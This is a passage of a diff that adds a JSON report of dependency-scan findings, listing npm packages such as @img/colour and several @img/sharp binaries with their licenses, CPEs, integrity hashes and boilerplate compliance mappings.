"^4.3.0", + "long": "^5.0.0", + "protobufjs": "^7.5.3", + "yargs": "^17.7.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ba1c7d59d68ea634", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/colour 1.1.0", + "title": "@img/colour 1.1.0", + "description": "Package discovered: @img/colour 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0b879a880de07100", + "name": "@img/colour", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/colour:\\@img\\/colour:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/colour@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/colour/-/colour-1.1.0.tgz", + "integrity": "sha512-Td76q7j57o/tLVdgS746cYARfSyxk8iEfRxewL9h4OMzYhbW4TAcppl0mT4eyqXddh6L/jwoM75mo7ixa/pCeQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "69b8f19d695c4a0d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-darwin-arm64 0.34.5", + "title": "@img/sharp-darwin-arm64 0.34.5", + "description": "Package discovered: @img/sharp-darwin-arm64 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "535aeb1bbda7aba8", + "name": "@img/sharp-darwin-arm64", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin-arm64:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin-arm64:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin_arm64:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin_arm64:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-darwin-arm64@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-darwin-arm64/-/sharp-darwin-arm64-0.34.5.tgz", + "integrity": "sha512-imtQ3WMJXbMY4fxb/Ndp6HBTNVtWCUI0WdobyheGf5+ad6xX8VIDO8u2xE4qc/fr08CKG/7dDseFtn6M6g/r3w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d46a9ddb45c9c115", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-darwin-x64 0.34.5", + "title": "@img/sharp-darwin-x64 0.34.5", + "description": "Package discovered: @img/sharp-darwin-x64 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0e26c2a4fd47f5b6", + "name": "@img/sharp-darwin-x64", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin-x64:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin-x64:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin_x64:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin_x64:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-darwin-x64@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-darwin-x64/-/sharp-darwin-x64-0.34.5.tgz", + "integrity": "sha512-YNEFAF/4KQ/PeW0N+r+aVVsoIY0/qxxikF2SWdp+NRkmMB7y9LBZAVqQ4yhGCm/H3H270OSykqmQMKLBhBJDEw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f40ef319dfe0f7ca", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4", + "title": "@img/sharp-libvips-darwin-arm64 1.2.4", + "description": "Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c127f66367bb283f", + "name": "@img/sharp-libvips-darwin-arm64", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "LGPL-3.0-or-later", + "spdxExpression": "LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin-arm64:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin-arm64:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin_arm64:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin_arm64:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-libvips-darwin-arm64@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-darwin-arm64/-/sharp-libvips-darwin-arm64-1.2.4.tgz", + "integrity": "sha512-zqjjo7RatFfFoP0MkQ51jfuFZBnVE2pRiaydKJ1G/rHZvnsrHAOcQALIi9sA5co5xenQdTugCvtb1cuf78Vf4g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f2d59ff4b7dad330", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-libvips-darwin-x64 1.2.4", + "title": "@img/sharp-libvips-darwin-x64 1.2.4", + "description": "Package discovered: @img/sharp-libvips-darwin-x64 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9896d5c1cacbd583", + "name": "@img/sharp-libvips-darwin-x64", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "LGPL-3.0-or-later", + "spdxExpression": "LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin-x64:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin-x64:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin_x64:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin_x64:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-libvips-darwin-x64@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-libvips-darwin-x64/-/sharp-libvips-darwin-x64-1.2.4.tgz", + "integrity": "sha512-1IOd5xfVhlGwX+zXv2N93k0yMONvUlANylbJw1eTah8K/Jtpi15KC+WSiaX/nBmbm2HxRM1gZ0nSdjSsrZbGKg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7b39904a53a17a82", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-libvips-linux-arm 1.2.4", + "title": "@img/sharp-libvips-linux-arm 1.2.4", + "description": "Package discovered: @img/sharp-libvips-linux-arm 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "35db8dcfe65acc63", + "name": "@img/sharp-libvips-linux-arm", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "LGPL-3.0-or-later", + "spdxExpression": "LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-libvips-linux-arm@1.2.4", 